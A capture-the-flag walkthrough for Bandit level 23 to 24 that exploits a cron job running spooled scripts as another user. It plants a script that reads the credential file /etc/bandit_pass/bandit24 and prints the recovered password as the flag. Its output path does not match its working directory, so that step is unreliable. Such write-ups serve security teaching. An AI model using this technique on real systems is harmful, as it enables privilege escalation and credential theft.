### Level 23 --> Level 24

1. Connect to the server 

```bash 
$ ssh -p 2220 bandit23@bandit.labs.overthewire.org
```

2. Check for the cron program running in /etc/cron.d/

```bash
$ls /etc/cron.d/
cronjob_bandit15_root  cronjob_bandit22  
cronjob_bandit24
cronjob_bandit17_root  cronjob_bandit23  cronjob_bandit25_root
```

3. Read the program running on bandit24

```bash
$cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
```

4. Check what the shell script is running

```bash
$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done
```

3. Set name to bandit 24 and check what's in the directory

```bash
$ myname=bandit24
$ ls /var/spool
bandit24  cron  mail  rsyslog
```

4. Make your own temp directory for making stuff

```bash
$ mkdir /tmp/mine
$ cd /tmp/mine
```

5. Create a script that would grab the password.

```bash
$ touch test.sh
$ chmod 777 test.sh
$ vim test.sh
	cat /etc/bandit_pass/bandit24 > /tmp/secttp/password
```

6. Set permission on new password file

```bash
$ touch password
$ chmod 666 password
```

7. Add the file to the /var/spool/bandit24 directory and wait for the script to execute after a minute.

```bash
$ cp test.sh /var/spool/bandit24/
$ cat password
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
```
Flag is UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ